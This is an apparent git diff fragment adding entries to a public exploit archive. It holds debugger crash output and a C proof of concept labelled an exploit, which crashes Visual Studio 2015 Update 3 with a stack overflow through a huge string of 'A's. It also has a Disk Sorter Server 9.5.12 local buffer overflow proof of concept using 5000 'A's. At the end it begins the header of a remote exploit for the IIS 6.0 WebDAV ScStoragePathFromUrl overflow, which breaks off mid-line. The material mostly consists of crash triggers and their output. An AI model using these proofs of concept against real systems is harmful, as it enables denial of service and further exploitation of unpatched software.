(31e136ca) + + + +0:000> k + +# ChildEBP RetAddr + +00 0027900c 16610ca0 VCProject!CVCNode::GetVCProject+0x49 + +01 00279020 16610ca0 VCProject!CVCNode::GetVCProject+0x53 + +02 00279034 16610ca0 VCProject!CVCNode::GetVCProject+0x53 + +… + +ff 00279034 16610ca0 VCProject!CVCNode::GetVCProject+0x53 + + + + + + + +Crash 2: + + + +(10cc.1970): CLR exception - code e0434352 (first chance) + + + +(10cc.1970): Stack overflow - code c00000fd (first chance) + + + +eax=08675cf0 ebx=00000000 ecx=08675cf0 edx=39784634 esi=08675cf0 edi=0043e0f0 + +eip=397a0c68 esp=00349000 ebp=00349004 iopl=0 nv up ei pl zr na pe nc + +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 + + + +VCProject!CVCNode::GetVCProject+0x4: + +397a0c68 57 push edi + + + +0:000> 
!exchain + +0043e0f4: VCProject!memcmp+86f5 (398256e8) + +0043e124: VCProject!memcmp+876b (398257b0) + +0043e19c: msenv!_aulldiv+476d1 (51e1d818) + +0043e23c: msenv!_aulldiv+1567e (51dd2c66) + +0043e290: msenv!_aulldiv+65abf (51e4a010) + +0043e2dc: vcpkg!sqlite3_value_type+1f3a (390bac50) + +0043e348: msenv!_aulldiv+2b169 (51df35dc) + +0043e390: msenv!_aulldiv+2bb07 (51df45ac) + +0043e3e4: msenv!_aulldiv+2b1de (51df36ca) + + + +15a0a150 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a151 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a152 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a153 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a154 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a155 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a156 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a157 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + + + + + +Peter + + + +crash.c + +// Exploit Title : Microsoft Visual Studio 2015 update 3 – Stack overflow +// Date : 2017 - 03 - 26 +// Exploit Author : Peter Baris +// Vendor Homepage : http://www.saptech-erp.com.au +// Software Link : https://www.visualstudio.com/thank-you-downloading-visual-studio/?sku=Community&rel=15 +// Version : 2015 update 3 +// Tested on : Windows 7 Pro SP1 x64, Windows 10 Pro x64 + +// 2017-03-05 Reported to Microsoft +// a few ignorant messages from microsoft, stating that this is not causing data loss +// I have sent explanation about ctrl-s key combination +// 2017-03-26 Publishing + + +// Procedure to trigger the vulnerability +// Open the c source file simply by double clicing it +// In the properties windows change "Included In Project" to False -> click back to your source code's window + +#include + +int main() +{ + + 
printf("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); +} \ No newline at end of file diff --git a/platforms/windows/dos/41737.txt b/platforms/windows/dos/41737.txt new file mode 100755 index 000000000..1d868fd2d --- /dev/null +++ b/platforms/windows/dos/41737.txt @@ -0,0 +1,51 @@ +[+] Title: Disk Sorter Server v9.5.12 - Local Stack-based buffer overflow +[+] Credits / Discovery: Nassim Asrir +[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ +[+] Author Company: Henceforth +[+] CVE: N/A + +Vendor: +=============== + +http://www.disksorter.com/ + + +Download: +=========== + +http://www.disksorter.com/setups/disksortersrv_setup_v9.5.12.exe + + +Vulnerability Type: +=================== + +local stack-based buffer overflow + + +POC: +=================== + +Launch the program click on : + +1 - Server + +2 - Connect + +3 - and in the Share Name field inject (5000 "A") then the program crashed see the picture. + +CVE Reference: +=============== + +N/A + + +Tested on: +=============== + +Windows 7 + +Win xp + + + + diff --git a/platforms/windows/remote/41738.py b/platforms/windows/remote/41738.py new file mode 100755 index 000000000..8df257d66 --- /dev/null +++ b/platforms/windows/remote/41738.py 
@@ -0,0 +1,45 @@
+'''
+Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: